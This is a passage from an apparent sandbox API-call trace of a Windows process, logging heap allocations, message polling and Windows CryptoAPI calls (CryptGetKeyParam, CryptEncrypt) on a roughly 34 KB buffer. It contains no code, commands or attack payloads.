Size=0x14) returned 0x90d440 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0190.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0190.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0190.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0190.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0190.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.602] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0190.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0190.602] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0190.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.603] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.603] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.604] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.604] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0190.604] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.604] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.604] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.604] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.604] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.604] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.604] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.604] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.604] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.604] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.604] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0190.605] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.605] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8697, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x86a0) returned 1 [0190.605] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.605] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0190.605] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.605] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.605] CharLowerBuffW (in: lpsz="byte[34465]", cchLength=0xb | out: lpsz="byte[34465]") returned 0xb [0190.605] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.606] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.609] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0190.609] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.610] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc033f8*, pdwDataLen=0x87e820*=0x8697, dwBufLen=0x86a0 | out: pbData=0xc033f8*, pdwDataLen=0x87e820*=0x86a0) returned 1 [0190.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.610] HeapFree (in: 